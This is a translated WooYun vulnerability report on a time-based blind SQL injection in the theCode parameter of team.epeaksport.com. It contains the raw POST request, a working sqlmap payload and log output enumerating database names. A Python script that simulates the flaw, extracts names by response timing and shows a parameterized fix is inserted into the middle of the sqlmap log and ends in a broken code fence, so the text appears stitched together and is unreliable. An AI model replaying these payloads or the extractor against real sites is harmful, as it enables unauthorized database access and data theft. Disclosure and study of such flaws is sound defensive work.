
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0125972

Title: SQL injection in a PEAK (匹克) sub-site (17 databases)

Vendor: epeaksport.com

Author: 天地不仁 以万物为刍狗

Submitted: 2015-07-10 18:11

Fix time: 2015-07-15 18:12

Published: 2015-07-15 18:12

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-07-10: Details sent to the vendor, awaiting vendor handling
2015-07-15: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Welcome to the new vendor joining WooYun.

Detailed description:

POST request:

POST /XP001-ProductInfo/dataStorage.html HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://team.epeaksport.com/
Cookie: PHPSESSID=i532srvsrtg0ml6ui0icdfegc4
Host: team.epeaksport.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
property%5B0%5D%5Bcode%5D=22K9&property%5B0%5D%5Bstate%5D=1&storageSort=0&theCode=E42638H


The POST parameter theCode is injectable.

[Screenshot: 0.png]


Dumping data through this injection point is really slow, so I did not continue.

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: property[0][code]=22K9&property[0][state]=1&storageSort=0&theCode=E42638H' AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))RKdi)-- lVIE21=6 AND '000Q6sa'='000Q6sa
---
[18:02:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[18:02:43] [INFO] fetching database names
[18:02:43] [INFO] fetching number of databases
[18:02:43] [INFO] retrieved:
[18:02:43] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
1
[18:03:05] [INFO] adjusting time delay to 1 second due to good response times
7
[18:03:05] [INFO] retrieved: informa
[18:03:53] [ERROR] invalid character detected. retrying..
[18:03:53] [WARNING] increasing time delay to 2 seconds
[18:03:56] [ERROR] invalid character detected. retrying..
[18:03:56] [WARNING] increasing time delay to 3 seconds
[18:04:01] [ERROR] invalid character detected. retrying..
[18:04:01] [WARNING] increasing time delay to 4 seconds
[18:04:09] [ERROR] invalid character detected. retrying..
[18:04:09] [WARNING] increasing time delay to 5 seconds
[18:04:15] [ERROR] invalid character detected. retrying..
[18:04:15] [WARNING] increasing time delay to 6 seconds
[18:04:22] [ERROR] unable to properly validate last character value ('\?81')..
\?81ion
[18:04:47] [ERROR] invalid character detected. retrying..
[18:04:47] [WARNING] increasing time delay to 2 seconds
_schema
[18:05:47] [INFO] retrieved: e
[18:06:07] [ERROR] invalid character detected. retrying..
[18:06:07] [WARNING] increasing time delay to 3 seconds
p
[18:07:06] [ERROR] invalid character detected. retrying..
[18:07:06] [WARNING] increasing time delay to 4 seconds
eak
[18:07:49] [INFO] retrieved:
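The sqlmap log above recovers each character of a database name from nothing but whether the server paused, which is why every character costs a run of timed requests and why a noisy link produces the "invalid character detected" retries. The script below is an added example, not code from this report or from epeaksport.com: it models the vulnerable dataStorage.html handler with SQLite standing in for MySQL (SLEEP() is registered as a function that records the requested delay instead of blocking, so the whole run finishes instantly and offline), extracts two constructed schema names by bisection on response time, and then shows the same attacker code coming back empty once theCode is bound as a query parameter. The table and column names, the sample rows and the latency figures are all assumptions made for the demo.

```python
"""Offline simulation of the time-based blind SQL injection in theCode.

Added example, not code from this report or from epeaksport.com.
Assumptions: SQLite stands in for MySQL, SLEEP() is a registered function
that records the requested delay instead of blocking, and the tables,
column names and latency figures below are constructed for the demo.
"""
import sqlite3

BASE_LATENCY = 0.05  # assumed normal response time of the endpoint, seconds


class VulnerableApp:
    """Models dataStorage.html: theCode is concatenated straight into SQL."""

    def __init__(self, hardened=False):
        self.hardened = hardened
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE product (code TEXT, name TEXT)")
        self.conn.execute("INSERT INTO product VALUES ('E42638H', 'demo item')")
        # Constructed stand-in for MySQL's information_schema.schemata
        self.conn.execute("CREATE TABLE schemata (schema_name TEXT)")
        self.conn.executemany("INSERT INTO schemata VALUES (?)",
                              [("information_schema",), ("epeak",)])
        self.requested_delay = 0.0
        # MySQL has SLEEP(n); SQLite does not, so register one that only
        # accumulates the delay the attacker asked for (no real blocking).
        self.conn.create_function("SLEEP", 1, self._sleep)

    def _sleep(self, seconds):
        self.requested_delay += seconds
        return 0

    def data_storage(self, the_code):
        """Handle one POST and return the simulated response time in seconds."""
        self.requested_delay = 0.0
        try:
            if self.hardened:
                # Fix: bind the value; a quote inside theCode stays data.
                self.conn.execute("SELECT name FROM product WHERE code = ?",
                                  (the_code,)).fetchall()
            else:
                # Vulnerable: string concatenation, the bug class in the report.
                sql = "SELECT name FROM product WHERE code = '" + the_code + "'"
                self.conn.execute(sql).fetchall()
        except sqlite3.Error:
            pass  # a broken query is just a quick empty reply to the attacker
        return BASE_LATENCY + self.requested_delay


class TimeBasedExtractor:
    """Recovers strings one character at a time from response timing alone,
    the idea behind sqlmap's 'AND time-based blind' technique."""

    def __init__(self, app, sleep_seconds=1):
        self.app = app
        self.sleep_seconds = sleep_seconds
        self.requests = 0

    def oracle(self, condition):
        """True if the server slept, i.e. the injected SQL condition held."""
        payload = ("E42638H' AND (SELECT CASE WHEN (%s) THEN SLEEP(%d) ELSE 0 END)-- "
                   % (condition, self.sleep_seconds))
        self.requests += 1
        elapsed = self.app.data_storage(payload)
        return elapsed >= BASE_LATENCY + self.sleep_seconds

    def extract(self, expr, max_len=64):
        """Read the string value of SQL expression `expr` by bisection."""
        out = ""
        for pos in range(1, max_len + 1):
            lo, hi = 0, 127  # ASCII range: exactly 7 timed requests per char
            while lo < hi:
                mid = (lo + hi) // 2
                if self.oracle("unicode(substr(%s, %d, 1)) > %d" % (expr, pos, mid)):
                    lo = mid + 1
                else:
                    hi = mid
            if lo == 0:  # past the end: unicode('') is NULL, so it never sleeps
                break
            out += chr(lo)
        return out


def dump_schema_names(hardened=False, count=2):
    """Dump `count` schema names the way sqlmap's 'fetching database names' does.

    Returns (names, number_of_requests). With hardened=True the oracle
    never fires and every name comes back empty."""
    app = VulnerableApp(hardened=hardened)
    attacker = TimeBasedExtractor(app)
    names = []
    for offset in range(count):
        # MySQL form: SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET n
        names.append(attacker.extract(
            "(SELECT schema_name FROM schemata ORDER BY rowid LIMIT 1 OFFSET %d)" % offset))
    return names, attacker.requests


if __name__ == "__main__":
    print(dump_schema_names())               # (['information_schema', 'epeak'], 175)
    print(dump_schema_names(hardened=True))  # (['', ''], 14)
</ ```

On real MySQL the per-character probe would be IF(ASCII(SUBSTRING(expr, pos, 1)) > mid, SLEEP(n), 0) against information_schema.schemata; the CASE/unicode/substr form is the SQLite equivalent. Seven probes per character is the floor: sqlmap additionally confirms each character after the bisection, and the "invalid character detected. retrying.." lines in the log are that check failing when jitter pushes an undelayed reply past the threshold, after which it raises --time-sec. That retry loop, not the bisection, is what makes a time-based dump of 17 databases this slow, and it is also why the hardened branch is the only real remedy: binding theCode as a parameter leaves the attacker with nothing to time.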

Proof of vulnerability:

Fix recommendation:

Copyright notice: reprints must credit the source, 天地不仁 以万物为刍狗@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-07-15 18:12

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet